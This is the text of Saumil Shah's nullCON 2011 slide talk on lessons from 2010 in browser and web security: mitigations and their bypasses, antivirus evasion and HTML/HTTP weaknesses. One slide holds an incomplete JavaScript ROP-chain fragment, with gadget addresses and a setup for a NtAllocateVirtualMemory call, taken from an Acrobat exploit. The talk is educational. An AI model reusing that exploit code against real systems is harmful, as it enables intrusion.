2010: A Net Odyssey
Saumil Shah
nullCON Goa, 26.02.2011
net-square | n|u dwitiya
Welcome to NullCON!
nullcon.net | null.co.in
# who am i
Saumil Shah - CEO Net-Square
saumilshah
Hacker
What did we learn from 2010?
Attack Surface
ATTACK SURFACE 2010-2011
Wider Attack Surface
Ease of Exploitation
Mass Manufacturing
Worldwide coverage, hides your tracks.
Complexity...
...as never seen before!
A New Dimension!
GUARANTEED!! Fresh new bugs, present on most computers.
"The amount of intelligence in the world is constant. And the population is increasing."
Browser Wars
Death of Standards
HTTP +0.1
Reckless Plugins
Exploit Mitigation Techniques
/GS
SafeSEH
DEP
ASLR
Permanent DEP
ASLR and DEP
Mitigation     -> Bypass technique
/GS            -> SEH overwrites
SafeSEH        -> non-SEH DLLs
DEP            -> Return to LibC
ASLR           -> Heap Sprays
Permanent DEP  -> ROP
ASLR and DEP   -> JIT Sprays
It's SPLOIT TIME!
Jedi A/V Tricks
These are not the sploitz you're looking for.
Obfuscated Javascript decoded without using eval, document.write, etc.
See no eval!
Acrobat CoolType exploit
IE+JNLP exploit
High Tech vs. Low Tech
Acrobat CoolType exploit: Return Oriented Programming code
Escape-From-PDF: No fancy tricks
This iz what ?
I'm an evil Javascript
I'm an innocent image
// packv: 32-bit value -> "%uXXXX%uXXXX" escaped string, low word first
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
var addressof=new Array();
addressof["ropnop"]=0x6d81bdf0;
addressof["xchg_eax_esp_ret"]=0x6d81bdef;
addressof["pop_eax_ret"]=0x6d906744;
addressof["pop_ecx_ret"]=0x6d81cd57;
addressof["mov_peax_ecx_ret"]=0x6d979720;
addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
addressof["mov_pecx_eax_ret"]=0x6d8eee01;
addressof["inc_eax_ret"]=0x6d838f54;
addressof["add_eax_4_ret"]=0x00000000;
addressof["call_peax_ret"]=0x6d8aec31;
addressof["add_esp_24_ret"]=0x00000000;
addressof["popad_ret"]=0x6d82a8a1;
addressof["call_peax"]=0x6d802597;
function call_ntallocatevirtualmemory(baseptr,size,callnum){
var ropnop=packv(addressof["ropnop"]);
var pop_eax_ret=packv(addressof["pop_eax_ret"]);
var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
var call_peax_ret=packv(addressof["call_peax_ret"]);
var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
var popad_ret=packv(addressof["popad_ret"]);
var retval=""

<CANVAS>
Server Side Vulnerabilities
SQL injection
XSS
CSRF
RFI/LFI
Input tampering
Who broke the Web?
HTML: Standards... What Standards? Object access, JS too powerful, SRC=
HTTP: Old and idiotic. Stateless, No Auth, Bursty
W3C
"I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
Application Delivery
Authentication
Statefulness
Data Typing
Non-mutable
The Web at present: HTTP, HTML, AJAX, Flash, Sandbox, HTML5, Anti-XSS, WAF, Silverlight, Web sockets
Application Delivery: Authentication, Statefulness, Data Typing, Non-mutable
The FUTURE is HERE!
No longer Science Fiction
DEP bypassing ROP code
Man in the Browser Malware
Political Cyber warfare
The Solution?
Keep on patching!
I can haz sandbox
I Also Can!
The Solution?
HTML 8.0
HTTP 2.0
Browser Security Model
Self Contained Apps
n|u dwitiya
kthxbai
saumil@net-square.com
slideshare.net/saumilshah
www.net-square.com

nullcon 2011 - Lessons learned from 2010
